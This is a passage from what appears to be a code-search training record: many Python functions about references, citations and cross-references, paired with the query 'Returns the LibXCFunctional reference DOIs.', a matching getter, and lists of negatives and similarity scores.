full_reference_names=full_reference_names,\n )\n\n link_references = tuple((\n LinkReference(\n reference_name=remove_dunderscore_wrapper(match.group()),\n full_name=expand_fn(remove_dunderscore_wrapper(match.group())),\n offset=match.start(),\n length=match.end() - match.start(),\n ) for match in re.finditer(DEPENDENCY_RE, unprefixed_bytecode)\n ))\n\n return link_references", "def get_references(subarray, filter='CLEAR', context='jwst_niriss_0134.imap'):\n # Accepted subarrays\n subarrays = ['SUBSTRIP96', 'SUBSTRIP256', 'FULL']\n if subarray not in subarrays:\n raise ValueError(\"{} is not a supported subarray. Please use {}\".format(subarray, subarrays))\n\n # Accepted filters\n filters = ['CLEAR', 'F277W']\n if filter not in filters:\n raise ValueError(\"{} is not a supported filter. Please use {}\".format(filter, filters))\n\n # F277W not yet supported. Just delete this line when F277W support is added to crds\n filter = 'CLEAR'\n\n params = {\"INSTRUME\": \"NIRISS\",\n \"READPATT\": \"NIS\",\n \"EXP_TYPE\": \"NIS_SOSS\",\n \"DETECTOR\": \"NIS\",\n \"PUPIL\": \"GR700XD\",\n \"DATE-OBS\": \"2020-07-28\",\n \"TIME-OBS\": \"00:00:00\",\n \"INSTRUMENT\": \"NIRISS\",\n \"FILTER\": filter,\n \"SUBARRAY\": subarray}\n\n # Default ref file path\n default_path = resource_filename('awesimsoss', 'files/refs/')\n\n # Collect reference files for subarray+filter combination\n try:\n import crds\n refs = crds.getreferences(params, context=context)\n except:\n\n refs = {'saturation': os.path.join(default_path, 'jwst_niriss_saturation_0010.fits'),\n 'photom': os.path.join(default_path, 'jwst_niriss_photom_0037.fits'),\n 'flat': os.path.join(default_path, 'jwst_niriss_flat_0190.fits'),\n 'gain': os.path.join(default_path, 'jwst_niriss_gain_0005.fits'),\n 'superbias': os.path.join(default_path, 'jwst_niriss_superbias_0120.fits'),\n 'dark': os.path.join(default_path, 'jwst_niriss_dark_0114.fits'),\n 'readnoise': os.path.join(default_path, 'jwst_niriss_readnoise_0001.fits'),\n 'linearity': os.path.join(default_path, 'jwst_niriss_linearity_0011.fits')}\n\n if subarray == 'SUBSTRIP96':\n refs['superbias'] = os.path.join(default_path, 'jwst_niriss_superbias_0111.fits')\n refs['dark'] = os.path.join(default_path, 'jwst_niriss_dark_0111.fits')\n\n if subarray == 'FULL':\n refs['gain'] = os.path.join(default_path, 'jwst_niriss_gain_0002.fits')\n refs['superbias'] = os.path.join(default_path, 'jwst_niriss_superbias_0029.fits')\n refs['dark'] = os.path.join(default_path, 'jwst_niriss_dark_0129.fits')\n\n # Check if reference files exist and load defaults if necessary\n for ref_name, ref_fn in refs.items():\n if not 'NOT FOUND' in ref_fn and not os.path.isfile(refs[ref_name]):\n refs[ref_name] = os.path.join(default_path, ref_fn)\n print(\"Could not get {} reference file from CRDS. 
Using {}.\".format(ref_name, ref_fn))\n\n return refs", "def show_refs(config, args):\n for item in lib.input_json_lines():\n yield config.repo.ref(item)", "def get_crossrefs(self):\n inter = self.get_interaction()\n crossrefs = {inter: inter.get_crossrefs()}\n crossrefs.update(self._economics.get_crossrefs())\n return crossrefs", "def __call__(self, text):\n return extract_references(text, self.preprocessor, self.model)", "def list_ref_keys(self):\n print('=======')\n print('REFs')\n print('=======')\n for key in self.refs:\n print(key)", "def _filter_references_section(self, text):\n references_pattern = r\"(REFERENCE)|(reference)|(Reference)\"\n references_found = [i.start() for i in re.finditer(references_pattern, text)]\n if references_found != []:\n last_reference_index = references_found[-1]\n return text[:last_reference_index]\n else:\n return text", "def hit_to_references( hit, predicate ):\n link = biopsy.transfac.TableLink( hit.binder )\n for f in link.entry.factors:\n g = f.link.entry.gene\n if None != g:\n for r in g.entry.db_refs:\n p = predicate( r )\n if p:\n yield p", "def extract_references(content):\n references = {}\n content = content.replace(\"\\n\", \"\\\\n\")\n matches = re.findall('(\\[[0-9]+\\][^\\[]*?(?=\\[|Acknowledge|Fig|Table|Conclusion|pdf))', content)\n if matches:\n for match in matches:\n ref_id = get_reference_id(match)\n # No reference id exist -- skip it\n if ref_id != -1:\n value = match.replace('\\\\n', '\\n')\n references[ref_id] = value\n return references", "def get(self, *args):\n return _libsbml.ListOfCompartmentReferences_get(self, *args)", "def get_references(caller, callee):\n function_manager = currentProgram.getFunctionManager()\n\n ref_list = []\n callee_symbol = callee.getSymbol()\n callee_references = callee_symbol.getReferences()\n\n for ref in callee_references:\n addr = ref.getFromAddress()\n func = function_manager.getFunctionContaining(addr)\n if func == caller:\n ref_list.append(addr)\n\n return ref_list", "def get_crossrefs(self):\n return self._crossrefs", "def getRefs(self):\n\n backend = self.backend\n refs = self.moduleRefs\n for ref in refs:\n refPure = ref.rsplit(\":\", 1)[0]\n if refPure in self.seen:\n continue\n\n parts = splitModRef(ref)\n if not parts:\n self.good = False\n continue\n\n parts[2] = prefixSlash(normpath(parts[2])) # the relative bit\n theBackend = (\n None if parts[-1] is None or parts[-1] == backend else parts[-1]\n )\n\n if not self.getModule(*parts[0:-1], backend=theBackend):\n self.good = False", "def get_handle_referents(self):\n return self.get_citation_child_list()", "def get_connector_references(context):\n\n catalog = plone.api.portal.get_tool('portal_catalog')\n query = dict(portal_type='xmldirector.connector')\n items = list()\n for brain in catalog(**query):\n items.append(SimpleTerm(brain.UID, brain.UID, brain.Title))\n items.sort(key=operator.attrgetter(\"title\"))\n return SimpleVocabulary(items)", "def getreferingobjs(idfindex, idfobject):\n idf, edges = eppystuff.an_idfedges(idfindex)\n refobjs = idfobject.getreferingobjs() \n keys = [refobj.key for refobj in refobjs] \n objnames = [refobj.obj[1] for refobj in refobjs] \n idfkeys = idf_helpers.idfobjectkeys(idf)\n keysobjsindexes = [(idfkeys.index(refobj.key.upper()), \n idf.idfobjects[refobj.key.upper()].index(refobj))\n for refobj in refobjs] \n urls = [\"../../%s/%s\" % (idfkey, objkey) \n for idfkey, objkey in keysobjsindexes]\n urllinks = ['<a href=%s>%s</a>' % (url, name) \n for url, name in zip(urls, objnames)]\n lines = [\"%s->%s\" 
% (refobj.key, urllink) \n for refobj, urllink in zip(refobjs, urllinks)]\n return ', '.join(lines)", "def _expand_ref(self, element): \n if element.tag == 'xref':\n target = element.attrib.get('target', '')\n format = element.attrib.get('format', self.defaults['xref_format'])\n item = self._getItemByAnchor(target)\n if not self.indexmode:\n if not item:\n xml2rfc.log.warn(\"Can't resolve xref target %s\" % target)\n else:\n item.used = True\n # Create xref from index lookup\n if not item:\n text = '[' + target + ']'\n elif format == 'none':\n text = ''\n elif format == 'counter':\n text = item.counter\n elif format == 'title':\n text = item.title.strip() if item.title else ''\n else:\n # Default\n text = item.autoName\n\n # following the V3 HTML -\n # If you specify text, that is what you get.\n if element.text:\n text = element.text.rstrip()\n \n a = E.A(href='#' + target)\n a.attrib[\"class\"] = \"xref\"\n a.text = text\n if element.tail:\n a.tail = element.tail\n \n return [a]\n\n elif element.tag == 'eref':\n target = element.attrib.get('target', '')\n if element.text:\n a = E.A(element.text, href=target)\n a.tail = element.tail\n return [a]\n else:\n sp1 = E.SPAN('<')\n a = E.A(target, href=target)\n sp2 = E.SPAN('>')\n sp2.tail = element.tail\n return [sp1, a, sp2]\n elif element.tag == 'cref':\n self.cref_counter += 1\n anchor = element.attrib.get('anchor', None)\n if anchor is None:\n anchor = 'CREF' + str(self.cref_counter)\n a = E.A('[' + anchor + ']', id=anchor)\n a.attrib['class'] = 'info'\n source = element.attrib.get('source', '')\n if source:\n source = source + \": \"\n b = E.SPAN(source + element.text)\n b.attrib['class'] = 'info'\n a.append( b )\n self._indexCref(self.cref_counter, anchor)\n if element.tail:\n a.tail = element.tail\n return [a]\n elif element.tag == 'iref':\n return self._add_iref_to_index(element)\n elif element.tag == 'spanx':\n style = element.attrib.get('style', self.defaults['spanx_style'])\n text = ''\n if element.text:\n text = element.text\n elem = None\n if style == 'strong':\n elem = E.STRONG(text)\n elif style == 'verb':\n elem = E.SAMP(text)\n else:\n # Default to style=emph\n elem = E.EM(text)\n if element.tail:\n elem.tail = element.tail\n return [elem]", "def get_references(cls, pmids):\n\n references = cls.query.filter(cls.pmid.in_(pmids)).all()\n citations = {}\n\n for reference in references:\n citation_text = reference.authors + \". (\" + str(\n reference.year) + \"). 
\" + reference.title + \" \" + reference.journal + \".\"\n citations[reference.pmid] = citation_text\n\n return citations", "def cite(silent=False):\n if silent is False:\n print(__cite__)\n else:\n return __bibtex__", "def get_short_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_from( ea )\r\n\txrf2 = get_first_fcref_from( ea )\r\n\tif xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_from( ea, xrf )\r\n\twhile xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_from( ea, xrf )\r\n\treturn ret", "def get_short_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\txrf2 = get_first_fcref_to( ea )\r\n\tif xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def collect_citation_metadata(\n metadata: dict, references: List[pybtex.database.Entry]\n) -> dict:\n # Author list\n citation_authors = []\n for author_tier in [\"Core\", \"Developers\", \"Contributors\"]:\n for author in metadata[\"Authors\"][author_tier][\"List\"]:\n family_names, given_names = author[\"Name\"].split(\", \")\n citation_author = {\n \"family-names\": family_names,\n \"given-names\": given_names,\n }\n if \"Orcid\" in author:\n citation_author[\"orcid\"] = (\n \"https://orcid.org/\" + author[\"Orcid\"]\n )\n if \"Affiliations\" in author and len(author[\"Affiliations\"]) > 0:\n citation_author[\"affiliation\"] = \" and \".join(\n author[\"Affiliations\"]\n )\n citation_authors.append(citation_author)\n # References in CITATION.cff format\n citation_references = [to_cff_reference(entry) for entry in references]\n return {\n \"cff-version\": \"1.2.0\",\n \"message\": (\n \"Please cite SpECTRE in any publications that make use of its code\"\n \" or data. Cite the latest version that you use in your\"\n \" publication. The citation for this version is listed below.\"\n ),\n \"title\": metadata[\"Name\"],\n \"url\": metadata[\"Homepage\"],\n \"repository-code\": \"https://github.com/\" + metadata[\"GitHub\"],\n \"version\": metadata[\"Version\"],\n \"date-released\": metadata[\"PublicationDate\"],\n \"doi\": metadata[\"Doi\"],\n \"authors\": citation_authors,\n \"keywords\": metadata[\"Keywords\"],\n \"license\": metadata[\"License\"],\n \"references\": citation_references,\n }", "def getXRefsFrom(self):\r\n # type: () -> (list[int], list[int])\r\n crefs = []\r\n drefs = []\r\n\r\n\r\n # normalFlow = True\r\n # for ref in idautils.CodeRefsFrom(self.func_ea, normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea, not normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea-1, normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea-1, not normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n\r\n # needed to identify pool variables. drefs accessing the pool may access pointers\r\n # in the pool. 
the pointers should be retrieved instead\r\n size_pool = self.getSize(withPool=True)\r\n # for each instruction\r\n for i in idautils.FuncItems(self.func_ea):\r\n for xref in idautils.XrefsFrom(i, 0):\r\n # if the xref is to a far or near called function\r\n if xref.type == idc.fl_CN or xref.type == idc.fl_CF:\r\n if xref.to not in crefs:\r\n crefs.append(xref.to)\r\n # if the xref is to a read or write data access\r\n if xref.type == idc.dr_W or xref.type == idc.dr_R:\r\n if xref.to not in drefs:\r\n # if xref.to is in the pool, then retrieve content if it's a pointer\r\n if xref.to < self.func_ea + size_pool:\r\n # those are the references found at the pool location\r\n iteratedOnce = False\r\n for poolRef in idautils.XrefsFrom(xref.to, 0):\r\n if iteratedOnce:\r\n raise(FunctionException(\"%08X: there should only be one data xref in pool variable\"\r\n % (self.func_ea)))\r\n # there should only be one in the pool refernce\r\n if poolRef.to not in drefs:\r\n drefs.append(poolRef.to)\r\n iteratedOnce = True\r\n else:\r\n drefs.append(xref.to)\r\n\r\n # for ref in idautils.DataRefsFrom(self.func_ea):\r\n # drefs.append(ref)\r\n # for ref in idautils.DataRefsFrom(self.func_ea - 1):\r\n # drefs.append(ref)\r\n return crefs, drefs", "def list_ref0s(self):\n print('-----\\nREF0s\\n-----')\n self._print_dict(self.ref0s)", "def get_reference_list(reference_sequences_path):\n\n\ttry:\n\t\tinfile = open(reference_sequences_path, \"rU\")\n\t\tsequences = infile.read()\n\t\treference_sequences = sequences.splitlines()\n\t\tinfile.close()\n\t\treturn reference_sequences\n\texcept IOError as e:\n\t\tprint(str(e))\n\t\tsys.exit(1) # Aborts program. (exit(1) indicates that an error occurred)", "def get_all_references(alignedsegment):\n \n references = [alignedsegment.reference_name]\n \n # Some reads don't have secondary hits\n if not alignedsegment.has_tag('XA'):\n return references\n \n # XA is a string contigname1,<other info>;contigname2,<other info>; ...\n secondary_alignment_string = alignedsegment.get_tag('XA')\n secondary_alignments = secondary_alignment_string.split(';')[:-1]\n \n for secondary_alignment in secondary_alignments:\n references.append(secondary_alignment.partition(',')[0])\n \n return references", "def add_ref_tag(basicSeqs):\r\n\r\n formattedBasicSeqs=list(basicSeqs) \r\n for record in formattedBasicSeqs:\r\n record.id=record.id+'_Ref'\r\n record.name=record.name+'_Ref'\r\n record.description=record.description+'_Ref'\r\n return formattedBasicSeqs", "def get_report_item_references_url(references_node):\n references_urls = []\n for reference_node in list(references_node):\n for child in list(reference_node):\n if child.tag == 'URL':\n references_urls.append(child.text)\n return references_urls", "def ref_to_link(txt):\n text = txt.group(1) # because it was a match in a regular expression\n\n thecite, everythingelse = first_bracketed_string(text)\n thecite = thecite[1:-1] # strip curly brackets\n thecite = thecite.replace(\"\\\\\",\"\") # \\href --> href\n\n refs = thecite.split(\",\")\n ans = \"\"\n\n # print \"refs\",refs\n\n for ref in refs:\n ref = ref.strip() # because \\cite{A, B, C,D} can have spaces\n this_link = \"\"\n if ref.startswith(\"href\"):\n the_link = re.sub(r\".*{([^}]+)}{.*\", r\"\\1\", ref)\n click_on = re.sub(r\".*}{([^}]+)}\\s*\", r\"\\1\", ref)\n this_link = '{{ LINK_EXT(\"' + click_on + '\",\"' + the_link + '\") | safe}}'\n elif ref.startswith(\"doi\"):\n ref = ref.replace(\":\",\"\") # could be doi:: or doi: or doi\n the_doi = ref[3:] # remove the 
\"doi\"\n this_link = '{{ LINK_EXT(\"' + the_doi + '\",\"https://doi.org/' + the_doi + '\")| safe }}'\n elif ref.lower().startswith(\"mr\"):\n ref = ref.replace(\":\",\"\")\n the_mr = ref[2:] # remove the \"MR\"\n this_link = '{{ LINK_EXT(\"' + 'MR:' + the_mr + '\", '\n this_link += '\"http://www.ams.org/mathscinet/search/publdoc.html?pg1=MR&s1='\n this_link += the_mr + '\") | safe}}'\n elif ref.lower().startswith(\"arxiv\"):\n ref = ref.replace(\":\",\"\")\n the_arx = ref[5:] # remove the \"arXiv\"\n this_link = '{{ LINK_EXT(\"' + 'arXiv:' + the_arx + '\", '\n this_link += '\"http://arxiv.org/abs/'\n this_link += the_arx + '\")| safe}}'\n\n\n if this_link:\n if ans:\n ans += \", \"\n ans += this_link\n\n return '[' + ans + ']' + everythingelse", "def get_references(input, verbose=False):\n\n # TODO: Make this a class reference parser\n\n # *** These tags are mobile-site specific\n\n # When we don't have proper access rights, this is present in the html\n GUEST_TAG_TUPLE = (\"li\", {\"id\": \"menuGuest\"})\n\n # Entries are \"li\" tags with classes of the form:\n # article-reference-article\n # article-reference-other-ref\n REFERENCE_TAG_TUPLE = (\"li\", {\"class\": re.compile('article-reference-*')})\n\n # This is the URL to the page that contains the document info, including\n # reference material\n BASE_URL = _SD_URL + '/science/article/pii/'\n\n # This URL was found first via Fiddler, then via closer inspection of the script\n # 'article_catalyst.js' under sciencedirect.com/mobile/js in the function\n # resolveReferences\n REF_RESOLVER_URL = _SD_URL + '/science/referenceResolution/ajaxRefResol'\n\n # Return the BeautifulSoup result, the requests session, and the requests response\n if _is_url(input):\n pii = _extract_pii(input)\n else:\n pii = input\n\n sess = requests.Session()\n\n if verbose:\n print('Requesting main page for pii: %s' % pii)\n resp = sess.get(BASE_URL + pii, cookies={'Site': 'Mobile'})\n\n # Step 2 - Get the reference tags\n\n soup = BeautifulSoup(resp.text)\n\n reference_section = soup.find(\"ol\", {\"class\": \"article-references\"})\n\n if reference_section is None:\n # Then we might be a guest. In other words, we might not have sufficient\n # privileges to access the data we want. Generally this is protected via\n # IP mask. When I'm working from home I need to VPN into work so\n # that I can access the data :/\n print(\"reference_section is None\")\n temp = soup.find(*GUEST_TAG_TUPLE)\n if temp is None:\n # We might have no references ... (Doubtful)\n raise ParseException(\"References were not found ..., code error likely\")\n else:\n raise InsufficientCredentialsException(\n \"Insufficient access rights to get referencs, requires certain IP addresses (e.g. university based IP)\")\n\n ref_tags = reference_section.find_all(*REFERENCE_TAG_TUPLE)\n\n n_refs = len(ref_tags)\n\n if n_refs == 0:\n return None\n\n # Step 3 - Resolve reference links\n # --------------------------------------------------------------------------\n # The returned html code contains javascript which returns more information\n # about each reference, such as:\n #\n # - links to the full text\n # - DOI \n\n\n # Step 3.1 - Make the request for the information\n # --------------------------------------------------------------------------\n # We need the eid of the current entry, it is of the form:\n #\n # SDM.pm.eid = \"1-s2.0-0006899387903726\"\n #\n # * I think this entry gets deleted after the requests so it may not be\n # visible if looking for it in Chrome. 
\n match = re.search('SDM\\.pm\\.eid\\s*=\\s*\"([^\"]+)\"', resp.text)\n #eid = match.group(1)\n\n # This list comes from the resolveReferences function in article_catalyst.js\n payload = {\n '_pii': pii,\n '_refCnt': n_refs,\n '_docType': 'article', # yikes, this might change ...\n '_refRangeStart': '1',\n '_refRangeCount': str(n_refs)} # This is normally in sets of 20's ...\n # I'm not sure if it is important to limit this. The browser then\n # makes a request fromr 1 count 20, 21 count 20, 41 count 20 etc,\n # It always goes by 20 even if there aren't 20 left\n\n if verbose:\n print('Requesting reference links')\n r2 = sess.get(REF_RESOLVER_URL, params=payload)\n\n # Step 3.2 - Parse the returned information into single entries\n # --------------------------------------------------------------------------\n # This could probably be optimized in terms of execution time. We basically\n # get back a single script tag. Inside is some sort of hash map for links\n # for each reference.\n #\n # The script tag is of the form:\n # myMap['bibsbref11']['refHtml']= \"<some html stuffs>\"; \n # myMap['bibsbref11']['absUrl']= \"http://www.sciencedirect.com/science/absref/sd/0018506X7790068X\";\n # etc.\n #\n # - Each entry is quite long.\n # - Normally contains html\n # - can be empty i.e. myMap['bibsbref11']['refHtml'] = \"\";\n # - the refHtml is quite interesting\n # - the absolute url is not always present (and currently not parsed)\n more_soup = BeautifulSoup(r2.text)\n script_tag = more_soup.find('script')\n\n # We unquote the script text as it is transmitted with characters escaped\n # and we want the parsed data to contain the non-escaped text\n #\n # We might eventually want to move this to being after the regular expression ...\n script_text = urllib_unquote(script_tag.text)\n\n ref_match_result = re.findall(\"myMap\\['bibsbref(\\d+)'\\]\\['refHtml'\\]=\\s?\" + '\"([^\"]*)\";', script_text)\n # Tokens:\n # 0 - the # from bibsbref#\n # 1 - the html content from the 'refHtml' entry\n # \n # NOTE: We don't really use the #, so we might remove the () around\n # \\d+ which would shift the index from 1 to 0\n if verbose:\n print('Creating reference objects')\n\n if len(ref_match_result) > 0:\n zipped = zip(ref_tags, ref_match_result, range(n_refs))\n ref_objects = [ScienceDirectRef(ref_tag, ref_link_info[1], ref_id) for\n ref_tag, ref_link_info, ref_id in zipped]\n else:\n zipped = zip(ref_tags, range(n_refs))\n ref_objects = [ScienceDirectRef(ref_tag, ref_id) for\n ref_tag, ref_id in zipped]\n\n # Step 4:\n # --------------------------------------------------------------------------\n # TODO: Improve documentation for this step\n\n if verbose:\n print('Retrieving Scopus Counts')\n\n ref_scopus_eids = [] # The Scopus IDs of the references to resolve\n # but with a particular formatting ...\n ref_count = 0 # Number of references we haven't resolved\n\n ref_count_list = []\n # NOTE: Browser requests these in the reverse order ...\n for ref_id, ref in enumerate(ref_objects):\n\n if ref._data_sceid is not None:\n ref_scopus_eids.append(ref._data_sceid + ',' + str(ref_id + 1) + '~')\n ref_count += 1\n\n # If we've got enough, then update the counts\n # The 20 may be arbitrary but it was what was used in original JS\n if ref_count > 20:\n ref_count_list += _update_counts(sess, ref_scopus_eids, REF_RESOLVER_URL)\n ref_count = 0\n ref_scopus_eids = []\n\n # Get any remaining reference counts\n if ref_count != 0:\n ref_count_list += _update_counts(sess, ref_scopus_eids, REF_RESOLVER_URL)\n\n # Take the 
raw data and set the citation count for each object\n for ref_tuple in ref_count_list:\n ref_id = int(ref_tuple[0]) - 1\n ref_count = int(ref_tuple[1])\n ref_objects[ref_id].scopus_cite_count = ref_count\n\n # All done!\n # ---------\n return ref_objects", "def parse_ticket_references(text):\r\n return JIRA_RE.findall(text)", "def documentation_links(self):\n return self._documentation_links", "def fetchRefSeq(genome = 'hg18',lookupval = 'name'):\n cursor=gbdbConnect(gbdbname=genome)\n select=\"SELECT * FROM refGene\"\n cursor.execute(select)\n rows=cursor.fetchall()\n output={}\n for chr in genomelib.chr_names:\n output[chr]={}\n output[chr]['+']={}\n output[chr]['-']={}\n for row in rows:\n if row['chrom'] in genomelib.chr_names:\n output[row['chrom']][row['strand']][row[lookupval]]=row\n return output", "def refs_ii(self):\n return self._refs_ii", "def load_bib(bib_name):\n print(\"Reading BibTex File: {}\".format(bib_name))\n curdir = osp.abspath('.')\n bib_path = osp.join(curdir, bib_name)\n print(\"Path: {}\".format(bib_path))\n print('Creating library..')\n add_dir('library')\n with open(bib_path, 'r') as f:\n # txt = f.read()\n line = f.readline()\n i = 0\n start = False\n while line:\n i += 1\n if (line.find('@')==1) or start: # reading entry\n if start == False:\n filename = get_name(line)\n start = True\n if line.find('title')==1:\n link = get_link(line)\n if link is not None:\n savepath = osp.join(curdir, 'library', filename+'.pdf')\n save_pdf(link, savepath)\n if (line.find('}')==1): # end of entry\n start=False\n line = f.readline()\n print(i) # print line number" ]
[ "0.69096875", "0.63146305", "0.6111194", "0.6034255", "0.5903538", "0.5896246", "0.58946764", "0.58436126", "0.5805503", "0.5782022", "0.5763529", "0.5747076", "0.5733833", "0.57011646", "0.5679117", "0.56542027", "0.5642207", "0.56400794", "0.55577713", "0.55523235", "0.5548791", "0.5536262", "0.54992914", "0.54380506", "0.54347897", "0.5432711", "0.54304373", "0.5425337", "0.53915775", "0.53914505", "0.53538495", "0.53508687", "0.5349295", "0.5324914", "0.53219897", "0.5305879", "0.53050894", "0.5297182", "0.52593064", "0.52430576", "0.5240386", "0.52261496", "0.52075565", "0.52041805", "0.5196106", "0.518963", "0.51819885", "0.5178843", "0.5175414", "0.51667696", "0.51625204", "0.515936", "0.51348954", "0.5126413", "0.51196676", "0.51191366", "0.5101062", "0.5088137", "0.50783145", "0.5058605", "0.504729", "0.5046995", "0.50418586", "0.50322926", "0.50068533", "0.49948713", "0.49942032", "0.4987093", "0.49865916", "0.4984957", "0.49837178", "0.49834168", "0.49754965", "0.49750984", "0.49725375", "0.49584928", "0.49511915", "0.49410874", "0.49195287", "0.4907939", "0.49052498", "0.4899435", "0.48911375", "0.48802054", "0.48757562", "0.4874434", "0.48730758", "0.4850705", "0.48486063", "0.4843969", "0.4842659", "0.48381236", "0.4833999", "0.48201317", "0.48153853", "0.48134458", "0.48020083", "0.47993743", "0.47969073", "0.4779897" ]
0.5591979
18
Returns the LibXCFunctional reference DOIs.
def get_doi(self):
    return self._dois
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def list_defect_refs(self):\n print('-----------\\nDEFECT_REFs\\n-----------')\n self._print_dict(self.defect_refs)", "def list_refs(self):\n pass", "def references(self) -> \"IterableList[Reference]\":\n return Reference.list_items(self)", "def list_defect_ref_keys(self):\n print('=======')\n print('DEFECT_REFs')\n print('=======')\n for key in self.defect_refs:\n print(key)", "def getXRefsTo(self):\r\n # type: () -> (list[int], list[int])\r\n crefs = []\r\n drefs = []\r\n # If the current address is function process it\r\n if idc.get_func_flags(self.func_ea) != -1:\r\n # Find all code references to func\r\n ref = idc.get_first_cref_to(self.func_ea)\r\n while ref != idaapi.BADADDR:\r\n # name = get_func_name(ref)\r\n # if not name: name = \"ROM:%08X\" % ref\r\n crefs.append(ref)\r\n ref = idaapi.get_next_cref_to(self.func_ea, ref)\r\n # Find all data references to func\r\n for ref in idautils.DataRefsTo(self.func_ea):\r\n drefs.append(ref)\r\n for ref in idautils.DataRefsTo(self.func_ea + 1):\r\n drefs.append(ref)\r\n\r\n return crefs, drefs", "def GetExternRefs(*args):\n return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)", "def XCAFDoc_ShapeTool_GetExternRefs(*args):\n return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)", "def refs(self):\n return self._refs", "def get_refs(func):\n found = re.findall(\"References:(.*)\", func.__doc__, flags=re.DOTALL)\n if any(found):\n ref = \" \".join([s.strip() for s in found[0].split(\"\\n\")]).strip()\n return ref\n else:\n return \"\"", "def DOIs(self, default=[{}]):\n tmp = self.data.get('metadata', {}).get('dois', default)\n return [HEP.DOIObject(i) for i in tmp]", "def function_refs(self) -> List[FunctionReference]:\n return self._function_refs", "def getFileReferences():\n refNodes = pm.ls(rf=True)\n fileRefs = [r.referenceFile() for r in refNodes]\n return fileRefs", "def find_references(self):\n cls = self.__class__\n nodes = []\n for sobj in self._std.FindDependances(self.get_sobj()):\n nodes.append(cls(self._std, self._bld, sobj.GetID()))\n return nodes", "def get_references(self):\n\n return self._refs", "def find_references(doi):\n if doi is None:\n return None\n\n references = []\n if doi:\n response = requests.get(f\"https://opencitations.net/index/api/v1/references/{doi}\").json()\n if response:\n references = [{\"doi\": r['cited'].replace(\"coci =>\", \"\")} for r in response]\n\n if references:\n return references\n else:\n return None", "def get_all_refobjs(self, ):\n return cmds.ls(type=\"jb_reftrack\")", "def list_refs(self):\n print('----\\nREFs\\n----')\n self._print_dict(self.refs)", "def get_references(self):\n return self._references", "def get_short_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_from( ea )\r\n\txrf2 = get_first_fcref_from( ea )\r\n\tif xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_from( ea, xrf )\r\n\twhile xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_from( ea, xrf )\r\n\treturn ret", "def _refs(self, items):\n # type: (Iterable[Any]) -> Iterable[weakref.ReferenceType]\n return map(self.ref, items)", "def get_short_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\txrf2 = get_first_fcref_to( ea )\r\n\tif xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def refmodes(self):\n return self._refmodes", "def 
getDependencyList(self):\n return self.getDocumentedObject().getDependencyList()", "def documentation_links(self):\n return self._documentation_links", "def references(self):\n ref_nodes = self.root.xpath(\".//bib-reference\")\n return list(\n itertools.chain.from_iterable(\n self.get_reference_iter(node) for node in ref_nodes\n )\n )", "def list_all_refs(self):\n self.list_refs()\n self.list_ref0s()\n self.list_defect_refs()", "def DOIs(self, default=[None]):\n return self.data.get('dois', default)", "def registered_docs(self):\n return [t for t in self.registered if isinstance(t, dexy.doc.Doc)]", "def fetchReferences(self, dataRef, exposure):\n skyMap = dataRef.get(self.dataPrefix + \"skyMap\", immediate=True)\n tractInfo = skyMap[dataRef.dataId[\"tract\"]]\n patch = tuple(int(v) for v in dataRef.dataId[\"patch\"].split(\",\"))\n patchInfo = tractInfo.getPatchInfo(patch)\n references = lsst.afw.table.SourceCatalog(self.references.schema)\n references.extend(self.references.fetchInPatches(dataRef, patchList=[patchInfo]))\n return references", "def references_list( self, theWeaver ):\n return [ (c.name, c.seq) \n for c in theWeaver.reference_style.chunkReferencedBy( self ) ]", "def get_refs(self): \n for row in self._get_references_node():\n yield row.fetch_all_fields()", "def get_crossrefs(self):\n return self._crossrefs", "def get_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_from( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_from( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_from( ea, xrf )\r\n\treturn ret", "def getXRefsFrom(self):\r\n # type: () -> (list[int], list[int])\r\n crefs = []\r\n drefs = []\r\n\r\n\r\n # normalFlow = True\r\n # for ref in idautils.CodeRefsFrom(self.func_ea, normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea, not normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea-1, normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea-1, not normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n\r\n # needed to identify pool variables. drefs accessing the pool may access pointers\r\n # in the pool. 
